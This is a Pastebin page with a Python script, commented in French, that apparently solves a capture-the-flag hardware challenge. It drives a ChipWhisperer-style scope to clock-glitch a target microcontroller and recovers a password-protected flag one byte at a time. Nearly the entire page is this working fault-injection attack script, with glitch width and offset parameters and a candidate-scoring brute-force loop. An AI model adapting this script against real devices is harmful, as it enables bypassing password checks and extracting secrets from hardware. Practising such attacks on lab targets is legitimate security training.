Logo Pastebin.fr
Pastebin

Retrouvez, créez et partagez vos snippets en temps réel.

dfg

Content 
# =================================================
#     GLITCH CLOCK FLAG EXTRACTOR v4 (FAST MODE)
# =================================================

import time

good_spots = [
    (10.15625, -1.171875, 6),
    (10.15625,  1.171875, 1)
]

flag = ['G', 'H', '{']

# -------- Reset HW --------
def reboot_flush():
    scope.io.nrst = 'low'
    time.sleep(0.002)
    scope.io.nrst = 'high'
    time.sleep(0.004)
    try:
        target.ser.flush()
    except:
        pass
    time.sleep(0.002)

# -------- Test PW --------
def test_pw(pw_bytes, glitch):
    scope.glitch.width      = glitch[0]
    scope.glitch.offset     = glitch[1]
    scope.glitch.ext_offset = glitch[2]

    reboot_flush()

    scope.arm()
    target.simpleserial_write('z', bytes(pw_bytes))

    if scope.capture():
        return None

    val = target.simpleserial_read_witherrors('r', 15, timeout=40)
    if not val or not val["valid"]:
        return None
    return val["payload"]

# -------- Choisir le meilleur glitch spot pour ce byte --------
def pick_best_spot():
    scores = {}
    pw_dummy = [ord(c) for c in "GH{XXXXXXXXXXX}"][:15]
    for sp in good_spots:
        s = 0
        for _ in range(3):
            payload = test_pw(pw_dummy, sp)
            if payload and payload[0] == ord('G'):
                s += 1
        scores[sp] = s
    # choisir le meilleur
    return max(scores, key=scores.get)

# =================================================
#                EXTRACTION DU FLAG
# =================================================

for i in range(3, 15):
    print(f"\n[*] Byte {i}")

    # 1 — choisir automatiquement le meilleur glitch spot
    spot = pick_best_spot()
    print(f"[+] Spot utilisé : {spot}")

    # 2 — score rapide (3 tests par candidat)
    scores = []
    for cand in range(0x20, 0x7F):
        s = 0
        pw_test = [0x5A] * 15
        for j, c in enumerate(flag):
            pw_test[j] = ord(c)
        pw_test[i] = cand

        for _ in range(3):
            payload = test_pw(pw_test, spot)
            if payload and payload[0] == ord('G'):
                s += 1

        scores.append((s, cand))

    # garder les 5 meilleurs
    top = sorted(scores, reverse=True)[:5]
    print("   top-5 initial :", [(chr(c), s) for s, c in top])

    # 3 — round final : 20 tests
    best_c = None
    best_score = -1

    for s0, cand in top:
        s = 0
        pw_test = [0x5A] * 15
        for j, c in enumerate(flag):
            pw_test[j] = ord(c)
        pw_test[i] = cand

        for _ in range(20):
            payload = test_pw(pw_test, spot)
            if payload and payload[0] == ord('G'):
                s += 1

        print(f"   candidat {chr(cand)} → score final {s}")

        if s > best_score:
            best_score = s
            best_c = cand

    print(f"[+] Byte trouvé: {chr(best_c)}")
    flag.append(chr(best_c))

flag.append("}")

print("\n====================")
print(" FLAG =", "".join(flag))
print("====================")

Créé il y a 2 mois.

Rechercher un Pastebin

Aucun paste trouvé.